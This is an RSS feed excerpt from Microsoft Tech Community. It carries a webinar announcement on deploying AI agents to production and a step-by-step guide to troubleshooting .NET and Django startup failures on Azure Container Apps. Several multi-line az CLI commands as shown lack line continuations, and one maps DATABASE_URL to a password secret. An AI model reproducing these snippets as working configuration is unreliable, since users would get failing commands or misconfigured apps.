&lt;LI&gt;&lt;A href="https://learn.microsoft.com/en-us/azure/databricks/query-federation/onelake" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Configure Unity Catalog with OneLake shortcuts&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt;&lt;SPAN data-ccp-props="{&amp;quot;134233117&amp;quot;:false,&amp;quot;134233118&amp;quot;:false,&amp;quot;335551550&amp;quot;:1,&amp;quot;335551620&amp;quot;:1,&amp;quot;335559685&amp;quot;:720,&amp;quot;335559737&amp;quot;:0,&amp;quot;335559738&amp;quot;:0,&amp;quot;335559739&amp;quot;:0,&amp;quot;335559991&amp;quot;:360}"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/LI&gt;
&lt;LI&gt;&lt;A href="https://learn.microsoft.com/en-us/fabric/data-engineering/browse-spark-applications-monitoring-hub" target="_blank" rel="noopener"&gt;&lt;SPAN data-contrast="none"&gt;&lt;SPAN data-ccp-charstyle="Hyperlink"&gt;Monitor Fabric pipelines with the Fabric monitor hub&lt;/SPAN&gt;&lt;/SPAN&gt;&lt;/A&gt; &amp;nbsp;&lt;/LI&gt;
&lt;/UL&gt;</description>
      <pubDate>Tue, 09 Jun 2026 18:48:03 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/analytics-on-azure-blog/streaming-and-batch-data-architectures-with-microsoft-fabric-to/ba-p/4526166</guid>
      <dc:creator>Rafia_Aqil</dc:creator>
      <dc:date>2026-06-09T18:48:03Z</dc:date>
    </item>
    <item>
      <title>Announcing the Path to Production for Agents Webinar Series</title>
      <link>https://techcommunity.microsoft.com/t5/azure-architecture-blog/announcing-the-path-to-production-for-agents-webinar-series/ba-p/4526560</link>
      <description>&lt;P&gt;Many organizations have made significant progress exploring AI—building pilots, prototypes, and proofs of concept. Yet a common challenge remains: how do you move from promising experiments to production-ready systems that are secure, scalable, and trusted? Join us for the Path to Production Webinar Series on July 27-28, a two-day deep dive designed to help technical teams operationalize AI and agent-based solutions using proven architecture patterns, governance models, and engineering practices.&lt;/P&gt;
&lt;P&gt;Use this link to register: &lt;A class="lia-external-url" href="https://forms.cloud.microsoft/r/g8XmGUi5wq" target="_blank" rel="noopener"&gt;Path to Production for Agents&lt;/A&gt;&lt;/P&gt;
&lt;H1&gt;Why this series matters&lt;/H1&gt;
&lt;P&gt;A large percentage of AI initiatives never make it to production—not because of lack of ambition, but because organizations struggle to establish trustworthy, governed AI systems; build scalable architectural foundations; manage risk, cost, and operational complexity; and ensure reliability in non-deterministic systems. This webinar series addresses those challenges head-on with concrete, actionable guidance spanning the full lifecycle of production AI systems.&lt;/P&gt;
&lt;H1&gt;What attendees will learn&lt;/H1&gt;
&lt;P&gt;This series delivers an implementation-focused roadmap for building, deploying, and operating AI agents at enterprise scale. Each session dives deep into governance, architecture patterns, orchestration, security, evaluation, and observability - with reference architectures and real-world engineering examples. Learn how to design scalable agent systems, integrate with enterprise data and services, and apply best practices for reliability and performance.&amp;nbsp;&lt;BR /&gt;&lt;BR /&gt;Attendees will leave with practical techniques and proven patterns to confidently ship production-grade agent solutions. After the workshop, customers who have Unified Contracts are eligible for a packaged set of engagements that will implement this guidance with your Microsoft cloud solution architects. Otherwise, contact your partner to learn more about taking advantage of the Frontier Transformation Offer through the Frontier Accelerate program.&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;H1&gt;Session overview&lt;/H1&gt;
&lt;DIV class="styles_lia-table-wrapper__h6Xo9 styles_table-responsive__MW0lN"&gt;&lt;table border="1" style="border-width: 1px;"&gt;&lt;tbody&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Day&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Session&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Focus&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;&lt;STRONG&gt;Speaker&lt;/STRONG&gt;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;July 27&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;AI Center of Excellence (CoE) &amp;amp; Governance&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Create a governance framework with quality gates that helps organizations deliver secure, responsible, trustworthy AI at scale.&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Akiriti Mehta&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;Divye Sheth&lt;/P&gt;
&lt;img /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;July 27&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;AI Landing Zones&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Build a production-ready reference architecture for AI applications and agents with guardrails for networking, identity, security, and cost governance.&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Nadeem Ishqair&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;Bilal Amjad&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;July 27&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Agentic Architecture&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Adopt a governance-first, multi-agent architecture blueprint that embeds controls from user channels and orchestration through integration layers, data, and models.&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Yeliz Kilinc&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;Nour Shaker&lt;/P&gt;
&lt;img /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;July 28&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;AgentOps&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Apply DevOps principles to production AI, including evaluation, CI/CD quality gates, observability, monitoring, red teaming, and incident response.&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Paulo Lacerda&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;Richard Healy&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;DB Lee&lt;/P&gt;
&lt;img /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;July 28&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;AI Security, Trust &amp;amp; Observability&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Address prompt injection, data leakage, autonomous tool misuse, and AI-specific observability requirements for traceability, safety, and auditability.&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Yuening Chen&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;Raaid Mahbub&lt;/P&gt;
&lt;img /&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;
&lt;P&gt;July 28&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Solution Optimization&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Reduce token cost, cut latency, tune RAG, optimize multi-agent coordination, and apply FinOps practices for sustainable scale.&lt;/P&gt;
&lt;/td&gt;&lt;td&gt;
&lt;P&gt;Tanuja Bhamidipati&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;Fatos Ismali&lt;/P&gt;
&lt;img /&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;/td&gt;&lt;/tr&gt;&lt;/tbody&gt;&lt;colgroup&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;col style="width: 25.00%" /&gt;&lt;/colgroup&gt;&lt;/table&gt;&lt;/DIV&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;H1&gt;Day 1: Establishing the foundation for production AI&lt;/H1&gt;
&lt;P&gt;&lt;STRONG&gt;July 27&lt;/STRONG&gt;&lt;/P&gt;
&lt;H2&gt;AI Center of Excellence (CoE) &amp;amp; Governance&lt;/H2&gt;
&lt;P&gt;Why do so many AI initiatives die in the PoC graveyard? Because organizations cannot trust the AI. This session shows how an AI CoE plus governance framework creates a uniform quality gate at every layer of your AI application in an organization for delivering a single, organization-wide view of secure, responsible, trustworthy AI that is ready to scale.&lt;/P&gt;
&lt;H2&gt;AI Landing Zones&lt;/H2&gt;
&lt;P&gt;Scaling AI from experimentation to production demands a secure, governed, and scalable foundation. This session explores how AI Landing Zones provide a production-ready reference architecture for deploying AI applications and agents with the right guardrails for networking, identity, security, and cost governance, aligned with the Cloud Adoption Framework and Well-Architected best practices. Attendees will learn how to design AI platforms that balance innovation with compliance, accelerate time-to-production using validated architectures and infrastructure-as-code, and integrate AI services into enterprise environments.&lt;/P&gt;
&lt;H2&gt;Agentic Architecture&lt;/H2&gt;
&lt;P&gt;Many enterprise AI pilots stall not for lack of technology, but because they lack a trustworthy architecture. This session introduces a governance-first, multi-agent architecture blueprint that closes the trust gap by embedding uniform controls and quality checks at every level, from user channels and agent orchestration through integration layers to core data and models, under a common governance and security framework. Attendees will learn how this layered agentic architecture creates a reliable, enterprise-wide AI fabric that organizations can adopt with confidence, aligning AI initiatives with high standards of trust, interoperability, and scale.&lt;/P&gt;
&lt;H1&gt;Day 2: Operating and scaling AI in production&lt;/H1&gt;
&lt;P&gt;&lt;STRONG&gt;July 28&lt;/STRONG&gt;&lt;/P&gt;
&lt;H2&gt;AgentOps&lt;/H2&gt;
&lt;P&gt;This session covers the full lifecycle of deploying and operating agentic AI solutions in production. We will explore how teams can move from successful prototypes to production-ready agents using evaluation, CI/CD quality gates, observability, continuous monitoring, scheduled red teaming, and incident response practices. We will also cover how to apply DevOps principles to the unique challenges of AI systems, including non-deterministic behavior, prompt regression, model drift, tool-calling risk, and changing user behavior. Attendees will learn a practical AgentOps operating model for improving release confidence, detecting regressions earlier, and connecting agent operations back to Microsoft Foundry and Azure Monitor.&lt;/P&gt;
&lt;H2&gt;AI Security, Trust &amp;amp; Observability&lt;/H2&gt;
&lt;P&gt;This session focuses on securing AI systems in production, addressing risks beyond traditional application security such as prompt injection, data leakage, and autonomous tool misuse. It applies a defense-in-depth approach across identity, data protection, orchestration, and runtime controls. It also introduces AI-specific observability for trust and compliance, including traceability, safety and security monitoring, and auditability, ensuring AI systems are secure, controllable, and compliant at scale.&lt;/P&gt;
&lt;H2&gt;Solution Optimization&lt;/H2&gt;
&lt;P&gt;Getting AI to production is only half the battle. Once agentic workloads are live, organizations face compounding challenges including rising token costs, latency that degrades user trust, RAG pipelines that return noise instead of signal, and orchestration overhead that multiplies with every agent added to the mesh. This session provides a practical engineering playbook for optimizing agentic AI across the full stack, from model selection and inference routing through prompt compression, RAG tuning, caching strategies, and multi-agent coordination. It also covers the FinOps discipline required to control cost at scale, including capacity sizing, batch processing, and intelligent model routing. Attendees will leave with actionable patterns for reducing inference cost, cutting latency, and scaling reliably across regions.&lt;/P&gt;
&lt;H1&gt;Who should attend&lt;/H1&gt;
&lt;UL&gt;
&lt;LI&gt;Cloud and solution architects&lt;/LI&gt;
&lt;LI&gt;AI and ML engineers and developers&lt;/LI&gt;
&lt;LI&gt;Platform engineering and infrastructure teams&lt;/LI&gt;
&lt;LI&gt;Technical decision-makers driving AI transformation initiatives&lt;/LI&gt;
&lt;/UL&gt;
&lt;P&gt;If your team is working to move AI beyond prototypes into production-scale systems, this series will provide directly applicable guidance for architecture, governance, operations, and optimization.&lt;/P&gt;
&lt;H1&gt;Next steps after the webinar series:&lt;/H1&gt;
&lt;P&gt;We will conduct a personalized assessment of your organization’s readiness to adopt AI agents at scale.&lt;/P&gt;
&lt;H1&gt;Call to action&lt;/H1&gt;
&lt;P&gt;Join us on July 27-28 to accelerate your path from AI experimentation to trusted, enterprise-scale production systems. Registration details can be added to this announcement before publication.&lt;/P&gt;
&lt;P&gt;Use this link to register: &lt;A href="https://forms.cloud.microsoft/r/g8XmGUi5wq" target="_blank" rel="noopener"&gt;Path to Production for Agents&lt;/A&gt;&lt;/P&gt;</description>
      <pubDate>Tue, 09 Jun 2026 12:58:42 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/azure-architecture-blog/announcing-the-path-to-production-for-agents-webinar-series/ba-p/4526560</guid>
      <dc:creator>brauerblogs</dc:creator>
      <dc:date>2026-06-09T12:58:42Z</dc:date>
    </item>
    <item>
      <title>Troubleshooting Azure Container Apps and Jobs for .NET and Django Workloads</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-developer-community/troubleshooting-azure-container-apps-and-jobs-for-net-and-django/ba-p/4518303</link>
      <description>&lt;H1&gt;Introduction&lt;/H1&gt;
&lt;P&gt;Deploying to Azure Container Apps feels like a huge step forward — you get serverless containers, automatic scaling, built-in ingress, and managed environments without managing Kubernetes directly. But when something goes wrong and your container refuses to start, or your Container App Job silently fails, it can feel like debugging inside a black box.&lt;/P&gt;
&lt;P&gt;This first part of our four-part series walks through the most common deployment and startup failures you will hit when running .NET and Django applications on Azure Container Apps and Container App Jobs. We cover what the real error looks like, why it is happening under the hood, and what you need to do to fix it — step by step.&lt;/P&gt;
&lt;H3&gt;The Real-World Problem: "My Container App is stuck in a restart loop and I have no idea why"&lt;/H3&gt;
&lt;P&gt;This is probably the most common thing engineers report when they first move workloads to Azure Container Apps. The deployment finishes successfully, the revision shows as active, but the app never becomes healthy. In the Azure portal it cycles between `Running` and `Degraded`, and in the logs you see cryptic exit codes or — even worse — nothing at all.&lt;/P&gt;
&lt;P&gt;The root causes almost always fall into one of these buckets:&lt;/P&gt;
&lt;OL&gt;
&lt;LI&gt;The container exits immediately because the process crashes on startup (misconfiguration, missing secrets, unhandled exceptions).&lt;/LI&gt;
&lt;LI&gt;The health probe fails because the app takes too long to start or is listening on the wrong port.&lt;/LI&gt;
&lt;LI&gt;A Container App Job never completes because it times out or the job process exits with a non-zero code.&lt;/LI&gt;
&lt;/OL&gt;
&lt;P&gt;Let us walk through each of these in detail.&lt;/P&gt;
&lt;H5&gt;&lt;STRONG&gt;Scenario 1: Your .NET Application Crashes at Startup&lt;/STRONG&gt;&lt;/H5&gt;
&lt;H6&gt;&lt;STRONG&gt;What You See&lt;/STRONG&gt;&lt;/H6&gt;
&lt;P&gt;Your Container App revision goes into a restart loop. You check the Log Analytics workspace and see something like this:&lt;/P&gt;
&lt;LI-CODE lang="kusto"&gt;ContainerAppConsoleLogs_CL
| where ContainerAppName_s == "my-dotnet-api"
| where TimeGenerated &amp;gt; ago(30m)
| project TimeGenerated, Log_s
| order by TimeGenerated desc&lt;/LI-CODE&gt;
&lt;P&gt;The output shows:&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;Unhandled exception. System.InvalidOperationException: Unable to resolve service for type 'MyApp.Data.AppDbContext'&lt;/P&gt;
&lt;P&gt;&amp;nbsp; &amp;nbsp;at Microsoft.Extensions.DependencyInjection.ServiceProviderServiceExtensions.GetRequiredService&lt;/P&gt;
&lt;P&gt;&amp;nbsp; &amp;nbsp;...&lt;/P&gt;
&lt;P&gt;Application is shutting down.&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Or even more commonly with Entity Framework Core:&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;fail: Microsoft.EntityFrameworkCore.Database.Connection&lt;/P&gt;
&lt;P&gt;An error occurred using the connection to database 'mydb' on server 'myserver.database.windows.net'.&lt;/P&gt;
&lt;P&gt;System.Net.Sockets.SocketException: Connection refused&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H6&gt;&lt;STRONG&gt;Why This Happens&lt;/STRONG&gt;&lt;/H6&gt;
&lt;P&gt;When .NET 6+ applications start up, they run the entire `WebApplication.Build()` pipeline before accepting traffic. If any registered service — like a database context — cannot be constructed or if the connection string is missing or wrong, the application throws an unhandled exception and the process exits with a non-zero code. Container Apps detects this exit and restarts the container. This cycle repeats indefinitely.&lt;/P&gt;
&lt;P&gt;The most frequent trigger is missing or incorrectly named environment variables and secrets. In local development you rely on `appsettings.Development.json` or `user secrets`, but in Container Apps those files are not present unless you explicitly copy them into the image (which you should never do for secrets).&lt;/P&gt;
&lt;H6&gt;&lt;STRONG&gt;Step-by-Step Fix&lt;/STRONG&gt;&lt;/H6&gt;
&lt;P&gt;&lt;STRONG&gt;Step 1 — Verify your secrets and environment variables are configured correctly.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;In the Azure portal, navigate to your Container App → &lt;STRONG&gt;Configuration&lt;/STRONG&gt; → &lt;STRONG&gt;Secrets &lt;/STRONG&gt;and &lt;STRONG&gt;Environment variables&lt;/STRONG&gt;. Make sure every value your app reads from &lt;EM&gt;IConfiguration&lt;/EM&gt; is defined here.&lt;/P&gt;
&lt;P&gt;From the CLI you can inspect and update them like this:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;# Add or update a secret reference
az containerapp secret set 
  --name my-dotnet-api 
  --resource-group my-rg 
  --secrets "connectionstring=Server=myserver.database.windows.net;..."

# Reference that secret as an environment variable
az containerapp update 
  --name my-dotnet-api 
  --resource-group my-rg 
  --set-env-vars "ConnectionStrings__DefaultConnection=secretref:connectionstring"&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Step 2 — Make sure your .NET app reads configuration correctly.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;The naming convention that trips up almost everyone: Azure Container Apps uses double underscores (`__`) to represent the colon (`:`) separator in .NET configuration keys. So `ConnectionStrings:DefaultConnection` becomes `ConnectionStrings__DefaultConnection` as the environment variable name.&lt;/P&gt;
&lt;LI-CODE lang="csharp"&gt;// This reads from "ConnectionStrings__DefaultConnection" env var automatically

builder.Services.AddDbContext&amp;lt;AppDbContext&amp;gt;(options =&amp;gt;
    options.UseSqlServer(builder.Configuration.GetConnectionString("DefaultConnection")));&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Step 3 — Add a startup health check that gives meaningful feedback.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;Configure a liveness probe with a generous initial delay to avoid a container being killed before it has had time to start:&lt;/P&gt;
&lt;LI-CODE lang="yaml"&gt;# In your Container App YAML configuration

probes:
  - type: Liveness
    httpGet:
      path: /health
      port: 8080
    initialDelaySeconds: 30
    periodSeconds: 10
    failureThreshold: 5
  - type: Readiness
    httpGet:
      path: /health/ready
      port: 8080
    initialDelaySeconds: 15
    periodSeconds: 5
    failureThreshold: 3&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Add the corresponding health endpoint in your .NET app:&lt;/P&gt;
&lt;LI-CODE lang="csharp"&gt;// Program.cs

builder.Services.AddHealthChecks()
    .AddSqlServer(
        builder.Configuration.GetConnectionString("DefaultConnection")!,
        name: "database",
        tags: new[] { "ready" });

app.MapHealthChecks("/health");
app.MapHealthChecks("/health/ready", new HealthCheckOptions
{
    Predicate = check =&amp;gt; check.Tags.Contains("ready")
});&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Step 4 — Pull the raw container logs using the CLI&lt;/STRONG&gt; to see exactly what happened before the container exited:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az containerapp logs show 
  --name my-dotnet-api 
  --resource-group my-rg 
  --type console 
  --tail 50&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;H5&gt;&lt;STRONG&gt;Scenario 2: Your Django Application Fails to Start&lt;/STRONG&gt;&lt;/H5&gt;
&lt;H6&gt;&lt;STRONG&gt;What You See&lt;/STRONG&gt;&lt;/H6&gt;
&lt;P&gt;Your Django app deploys, the container starts, but within seconds it exits. In the logs you see one of these common errors:&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;django.core.exceptions.ImproperlyConfigured: Set the SECRET_KEY environment variable&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Or:&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;django.db.utils.OperationalError: could not connect to server: Connection refused&lt;/P&gt;
&lt;P&gt;&amp;nbsp; &amp;nbsp; Is the server running on host "localhost" (127.0.0.1) and accepting&lt;/P&gt;
&lt;P&gt;&amp;nbsp; &amp;nbsp; TCP/IP connections on port 5432?&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;Or the static files problem that catches almost everyone:&lt;/P&gt;
&lt;BLOCKQUOTE&gt;
&lt;P&gt;[Errno 2] No such file or directory: '/app/staticfiles'&lt;/P&gt;
&lt;/BLOCKQUOTE&gt;
&lt;H6&gt;&lt;STRONG&gt;Why This Happens&lt;/STRONG&gt;&lt;/H6&gt;
&lt;P&gt;Django validates its configuration eagerly when the WSGI/ASGI server starts. If `&lt;STRONG&gt;SECRET_KEY&lt;/STRONG&gt;` is not set, if `&lt;STRONG&gt;ALLOWED_HOSTS&lt;/STRONG&gt;` does not include the container's hostname or the ingress FQDN, or if `&lt;STRONG&gt;DEBUG=True&lt;/STRONG&gt;` is set in a configuration branch that requires a proper database, Django refuses to serve any requests.&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;The static files error comes up because many teams forget to run `&lt;STRONG&gt;python manage.py collectstatic&lt;/STRONG&gt;` as part of the container image build process. The `&lt;STRONG&gt;STATIC_ROOT&lt;/STRONG&gt;` directory simply does not exist at runtime.&lt;/P&gt;
&lt;H6&gt;&lt;STRONG&gt;Step-by-Step Fix&lt;/STRONG&gt;&lt;/H6&gt;
&lt;P&gt;&lt;STRONG&gt;Step 1 — Set required Django environment variables in your Container App.&lt;/STRONG&gt;&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az containerapp secret set 
  --name my-django-app 
  --resource-group my-rg 
  --secrets 
    "django-secret-key=your-very-secret-key-here" 
    "db-password=your-db-password"
az containerapp update 
  --name my-django-app 
  --resource-group my-rg 
  --set-env-vars 
    "DJANGO_SECRET_KEY=secretref:django-secret-key" 
    "DEBUG=False" 
    "ALLOWED_HOSTS=my-django-app.happyfield-abc123.eastus.azurecontainerapps.io" 

    "DATABASE_URL=secretref:db-password"&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Step 2 — Run `collectstatic` during Docker image build, not at runtime.*&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;This is a very common mistake. Static files should be baked into the image, not generated when the container starts. Update your `&lt;STRONG&gt;Dockerfile&lt;/STRONG&gt;`:&lt;/P&gt;
&lt;LI-CODE lang="docker"&gt;FROM python:3.11-slim
WORKDIR /app
COPY requirements.txt .
RUN pip install --no-cache-dir -r requirements.txt
COPY . .
# Collect static files at build time with a dummy SECRET_KEY
RUN SECRET_KEY=build-time-placeholder python manage.py collectstatic --noinput
EXPOSE 8000
CMD ["gunicorn", "myproject.wsgi:application", "--bind", "0.0.0.0:8000", "--workers", "2", "--timeout", "120"]&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Step 3 — Make sure Gunicorn is configured correctly for Container Apps.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;The most important thing to verify is that Gunicorn is binding to `&lt;STRONG&gt;0.0.0.0&lt;/STRONG&gt;` and not `&lt;STRONG&gt;127.0.0.1&lt;/STRONG&gt;`. Container Apps expects the application to listen on all interfaces so that the ingress layer can reach it. Also make sure the port matches what you defined in your Container App's ingress target port:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;# Set ingress to match Gunicorn's bind port
az containerapp ingress update 
  --name my-django-app 
  --resource-group my-rg 
  --target-port 8000 
  --type external&lt;/LI-CODE&gt;
&lt;P&gt;&lt;STRONG&gt;Step 4 — Handle database migrations safely.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;Never run `&lt;STRONG&gt;python manage.py migrate&lt;/STRONG&gt;` as part of your container startup command. If you have multiple replicas, all of them will try to run migrations simultaneously, which can corrupt your schema. Instead, use a Container App Job to run migrations as a pre-deployment step:&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;# Create a one-time Container App Job to run migrations

az containerapp job create 
  --name django-migrate-job 
  --resource-group my-rg 
  --environment my-aca-env 
  --trigger-type Manual 
  --replica-timeout 300 
  --image myregistry.azurecr.io/my-django-app:latest 
  --command "python" 
  --args "manage.py" "migrate" 
  --env-vars 
    "DJANGO_SECRET_KEY=secretref:django-secret-key" 
    "DATABASE_URL=secretref:db-password"


# Execute the migration job before deploying the new revision
az containerapp job start 
  --name django-migrate-job 
  --resource-group my-rg&lt;/LI-CODE&gt;
&lt;H5&gt;&lt;STRONG&gt;Scenario 3: Your Container App Job Fails Silently or Times Out&lt;/STRONG&gt;&lt;/H5&gt;
&lt;H6&gt;&lt;STRONG&gt;What You See&lt;/STRONG&gt;&lt;/H6&gt;
&lt;P&gt;You trigger a Container App Job — maybe it is a nightly data processing job, a scheduled report generator, or a cleanup task — and in the Azure portal the execution shows as &lt;STRONG&gt;Failed &lt;/STRONG&gt;with no helpful error message. Or it shows as&amp;nbsp;&lt;STRONG&gt;Running&lt;/STRONG&gt;&amp;nbsp;for an unusually long time and then transitions to&amp;nbsp;&lt;STRONG&gt;Failed&lt;/STRONG&gt;&amp;nbsp;with a timeout error.&lt;/P&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Why This Happens&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;Container App Jobs have a `&lt;STRONG&gt;replicaTimeout&lt;/STRONG&gt;` property. If your job process does not complete within that window, Azure Container Apps kills it and marks the execution as failed. This is different from Container Apps (services) where the container keeps running. Jobs are expected to run to completion and exit with code `&lt;STRONG&gt;0&lt;/STRONG&gt;`.&lt;/P&gt;
&lt;P&gt;The silent failure happens when your job process exits with a non-zero exit code but does not write anything to `&lt;STRONG&gt;stdout&lt;/STRONG&gt;` or `&lt;STRONG&gt;stderr&lt;/STRONG&gt;`. Container Apps records the exit code but has no log content to show you.&lt;/P&gt;
&lt;H6&gt;&lt;STRONG&gt;Step-by-Step Fix&lt;/STRONG&gt;&lt;/H6&gt;
&lt;P&gt;&lt;STRONG&gt;Step 1 — Make your job emit logs to stdout explicitly.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;Every print statement, every log line should go to `stdout` or `stderr`. In Python:&lt;/P&gt;
&lt;LI-CODE lang="python"&gt;import sys
import logging
logging.basicConfig(
    level=logging.INFO,
    format="%(asctime)s %(levelname)s %(message)s",
    handlers=[logging.StreamHandler(sys.stdout)]
)
logger = logging.getLogger(__name__)

def main():
    logger.info("Job starting")
    try:
        # your job logic here
        process_data()
        logger.info("Job completed successfully")
        sys.exit(0)

    except Exception as e:
        logger.error(f"Job failed with error: {e}", exc_info=True)
        sys.exit(1)&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;In .NET:&lt;/P&gt;
&lt;LI-CODE lang="csharp"&gt;// Use ILogger which writes to stdout by default in containers
public class MyJob
{
    private readonly ILogger&amp;lt;MyJob&amp;gt; _logger;
    public MyJob(ILogger&amp;lt;MyJob&amp;gt; logger)
    {
        _logger = logger;
    }

    public async Task RunAsync(CancellationToken cancellationToken)
    {
        _logger.LogInformation("Job starting at {Time}", DateTimeOffset.UtcNow);
        try
        {
            await ProcessDataAsync(cancellationToken);
            _logger.LogInformation("Job completed successfully");
        }
        catch (Exception ex)
        {
            _logger.LogError(ex, "Job failed");
            throw; // Let the process exit with non-zero code
        }
    }
}&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Step 2 — Set an appropriate replica timeout and retry count.&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;Be realistic about how long your job takes in production, then add a buffer:&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;az containerapp job update 
  --name my-processing-job 
  --resource-group my-rg 
  --replica-timeout 1800    # 30 minutes
  --replica-retry-limit 2    # Retry twice before marking as failed&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;Step 3 — Check job execution history and logs.&lt;/STRONG&gt;&lt;/P&gt;
&lt;LI-CODE lang="bash"&gt;# List recent job executions and their status
az containerapp job execution list 
  --name my-processing-job 
  --resource-group my-rg 
  --output table

# Get logs for a specific execution
az containerapp job execution show 
  --name my-processing-job 
  --resource-group my-rg 
  --job-execution-name my-processing-job-abc123&lt;/LI-CODE&gt;
&lt;P&gt;&amp;nbsp;&lt;/P&gt;
&lt;P&gt;From Log Analytics:&lt;/P&gt;
